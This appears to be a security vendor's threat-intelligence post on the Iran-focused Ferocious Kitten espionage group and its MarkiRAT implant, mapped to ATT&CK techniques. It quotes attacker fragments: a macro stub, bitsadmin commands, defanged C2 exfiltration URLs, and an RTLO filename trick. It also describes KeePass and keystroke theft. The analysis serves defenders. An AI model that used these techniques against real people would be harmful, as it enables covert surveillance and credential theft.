.svg)
.svg)
Ferocious Kitten APT Exposed: Inside the Iran-Focused Espionage Campaign
Ferocious Kitten is a covert cyber-espionage actor active since at least 2015 that has focused on Persian-speaking targets inside Iran, using politically themed decoy documents to trick dissidents, activists, and other individuals into opening weaponized files. Over multiple years, the group developed and deployed a custom implant known as MarkiRAT that provides broad collection capabilities, keystroke and clipboard logging, screenshots, filesystem searches for targeted file types and credential stores, remote command execution, and staged exfiltration over HTTP(S). Initial access is typically achieved through spearphishing with malicious Microsoft Office documents that contain macros or crafted MSHTML content.
Beyond simple startup persistence, Ferocious Kitten has used more intrusive hijacking techniques that implant the malware alongside legitimate applications: variants search for Telegram or Chrome installations, copy the malicious binary into those directories, and modify shortcuts so the malware runs when the user launches the real app. The group also employs common defense-evasion tricks such as the Right-to-Left Override (RTLO) unicode trick to make executables look like media files and abuses Windows utilities like BITS (via bitsadmin) to download files or probe outward-facing IP/proxy information. MarkiRAT probes for security software (reporting the presence of products such as Kaspersky or Bitdefender back to its C2) and supports "smart" collection that targets messaging artifacts and key store formats (e.g., KeePass, .kdbx) for prioritized exfiltration.
Public disclosure of the group’s activity came in a Kaspersky report published on June 16, 2021, which documented the lure material and the implant’s behaviors; later in 2021, the actor was observed exploiting the MSHTML RCE vulnerability CVE-2021-40444 to deliver a PowerShell-based stealer called PowerShortShell [1], showing the operator will adopt known exploits in addition to macro-based lures. Overall, Ferocious Kitten’s objective appears collection-focused and targeted rather than disruptive.
In this post, we'll review Ferocious Kitten’s notable historical operations, outline their key targeting and tradecraft, and analyze their tactics, techniques, and procedures (TTPs) to reveal how they conduct sustained espionage against Persian-speaking targets; finally, we’ll demonstrate how Picus can be used to strengthen defenses against this group.
Simulate APT Attacks with 14-Day Free Trial of Picus Platform
History & Major Activities of Ferocious Kitten Group
-
2015 (at least) – Ferocious Kitten is active, targeting Persian-speaking individuals in Iran, employing decoy documents with malicious macros to drop the malware "MarkiRAT" [2].
-
16 June 2021 – Publication by Kaspersky of the campaign: "6-year cyberespionage campaign uncovered in the Middle East", attributing it to Ferocious Kitten [2].
-
24 November 2021 – It was observed that Ferocious Kitten exploited the Microsoft MSHTML RCE vulnerability CVE-2021-40444 via spear-phishing documents, delivering a PowerShell stealer "PowerShortShell" [1].
ATT&CK Mapping (TTPs) of Ferocious Kitten Group
Tactic: Initial Access
T1566.001 Phishing: Spearphishing Attachment
Adversaries use the Spearphishing Attachment technique to send targeted emails containing malicious files, with the intent of gaining initial access to a system or network. Ferocious Kitten has been observed employing this technique as a primary infection vector. The actor crafts spearphishing emails that deliver weaponized Microsoft Office documents to their targets. One notable example is a document named "همبستگی عاشقانه با عاشقان آزادی2.doc", which translates to "Romantic solidarity with the lovers of freedom 2.doc". The malware not only infects the system with harmful executables but also displays anti-Iranian regime propaganda [2]:
|
I am Hussein Jafari |
Tactic: Execution
T1204.002 User Execution: Malicious File
A spearphishing attachment used by Ferocious Kitten contains macros that decode an embedded executable from hexadecimal and write it to the Public folder as "update.exe". After creating the file, the process copies the payload to the system’s Startup directory under the name "svehost.exe". This placement ensures the program launches automatically each time the system boots, establishing persistence. The code below shows the macros copying the payload to the startup folder [2]:
|
Sub thiswbmacro1() |
Tactic: Persistence
T1574 Hijack Execution Flow
A MarkiRAT variant used by Ferocious Kitten targets Telegram by hijacking its launch process to run the malware alongside the legitimate app. It searches the system for Telegram’s installation by locating an executable within a "tdata" directory, then copies itself to that folder while preserving the Telegram icon. The malware alters the Telegram shortcut to point to its own executable, ensuring that when the user opens Telegram, the malicious payload runs and then starts the genuine Telegram client [2].
Another Chrome-focused variant operates in two coordinated stages identified by internal names found in their PDB paths: mklgsecondary.pdb and mklgchrome.pdb. The first component, mklgsecondary, uses the BITS utility to download a file named chrome.txt from a command-and-control server, then alters the Chrome shortcut using the same technique seen in the Telegram-targeting variant. The downloaded payload (chrome.txt/mklgchrome) is configured to execute whenever Chrome is launched, ensuring both the legitimate browser and the MarkiRAT payload run simultaneously [2].
Tactic: Defense Evasion
T1036.002 Masquerading: Right-to-Left Override
The Right-to-Left Override (RTLO) technique is a form of masquerading that abuses a special Unicode character (U+202E) to manipulate how text is displayed. When this non-printing character is inserted into a string, such as a filename, it causes the subsequent characters to be rendered in reverse order, from right to left. Ferocious Kitten employed a right-to-left override trick that reverses portions of executable filenames, making them appear to have harmless extensions like .jpg or .mp4 instead of their true types [2]. It is highly effective at lowering the guard of a non-technical user, significantly increasing the probability that they will double-click and execute the file, believing it to be an image or video.
Here are examples using that same method:
|
MP4 Example: A file named MyVideo\u202E4pm.exe would be displayed as MyVideoexe.mp4.
|
T1197 BITS Jobs
MarkiRAT issues an additional beacon to a command-and-control server using Microsoft’s BITS administration utility. It cancels any existing job named "pdj", creates a new one, sets its priority to high, adds a file transfer pointing to hxxp://[C2 address]/i.php?u=[computername]-[username]&i=[proxy ip] with the destination %PUBLIC%\AppData\Libs\p.b, and then resumes the job. The likely intent is to circumvent or reveal proxy usage within the victim environment [2], enabling the server to determine the victim’s apparent external IP and maintain resilient communication. The used commands are given below:
|
> bitsadmin /cancel pdj |
Tactic: Discovery
T1518.001 Software Discovery: Security Software Discovery
MarkiRAT malware used by Ferocious Kitten enumerates running processes on the infected system to detect security tools, specifically searching for "exe" associated with Kaspersky and "bdagent.exe" for Bitdefender. If either is found, it reports the finding to its command-and-control server via a GET request parameter named "k", using the format:
|
hxxp://C2/ech/client.php?u=[computername]_[username]&k=[AV_value] |
A value of "1" indicates Kaspersky, while "3" indicates Bitdefender. Despite performing this check, the malware’s behavior remains unchanged regardless of the detected product [2].
Tactic: Collection
T1056.001 Input Capture: Keylogging
The MarkiRAT implant logs all user keystrokes, a core functionality reflected in its suspected internal name, 'Mark KeyLogGer'. It activates a keylogger that records all keystrokes and clipboard data, saving them locally in a .nfo file and exfiltrating the file to its command-and-control server via a POST request:
|
POST hxxp://[C2 address]/i.php?u=[computername]_[username]&i=[IP address] <Body Content> |
Before launching the keylogger, it terminates any active KeePass password manager process. This behavior appears intended to prompt a restart of KeePass, causing the user to reenter the master password, which the keylogger can then capture [2].
Tactic: Command and Control
T1071.001 Application Layer Protocol: Web Protocols
MarkiRAT uses HTTP POST and GET requests for all C2 communications, including victim registration and data exfiltration.
After completing initial actions, the malware spawns a persistent beaconing thread that repeatedly issues GET requests to hxxp://[C2 address]/ech/echo.php?req=rr&u=[computername]_[username], awaiting JSON-formatted tasking.
Supported commands include delay (sleep in milliseconds), uploadsf and uploads (enumerate a given directory and exfiltrate files), upload (exfiltrate a specific file), smart dir/fulldir (list files and directories, focusing on targeted extensions), smart upload (exfiltrate targeted file types from common locations such as Desktop, Documents, Pictures, Downloads, ViberPC, Skype, Telegram, and additional drives), runinhome (execute a file located in the malware repository in the user’s home directory), and download (retrieve a file from a URL to a specified local path).
File exfiltration uses an HTTPS POST to hxxps://[C2]/up/uploadx.php?=u=[computername]_[username], while directory listings are sent to hxxp://[C2]/ech/rite.php; targeted extensions include Office documents, PDFs, text files, images, and sensitive key/store formats such as .gpg, .pkr, .kdbx, and .key. Unrecognized commands are executed via cmd.exe /c through ShellExecuteW, and each beacon includes a screenshot saved as scr.jpg and uploaded using the same POST mechanism as file exfiltration [2].
How Picus Simulates Ferocious Kitten Attacks?
We also strongly suggest simulating Ferocious Kitten Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups like Salt Typhoon APT, FIN7, Calavry Werewolf APT, Earth Krahang APT within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Ferocious Kitten:
|
Threat ID |
Threat Name |
Attack Module |
|
56601 |
Ferocious Kitten Threat Group Campaign Malware Download Threat |
Network Infiltration |
|
41985 |
Ferocious Kitten Threat Group Campaign Malware Email Threat |
Network Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] REPUBLIC OF ALBANIA NATIONAL AUTHORITY FOR ELECTRONIC CERTIFICATION AND CYBER SECURITY DIRECTORATE OF CYBER SECURITY ANALYSIS, "IRANIAN HACKER GROUPS PROFILES." Accessed: Oct. 27, 2025. [Online]. Available: https://aksk.gov.al/wp-content/uploads/2024/04/Iranian-Hacker-Groups-Profiles-v1.0_ENG.pdf
[2] GReAT, "Ferocious Kitten: 6 years of covert surveillance in Iran," Kaspersky. Accessed: Oct. 27, 2025. [Online]. Available: https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/
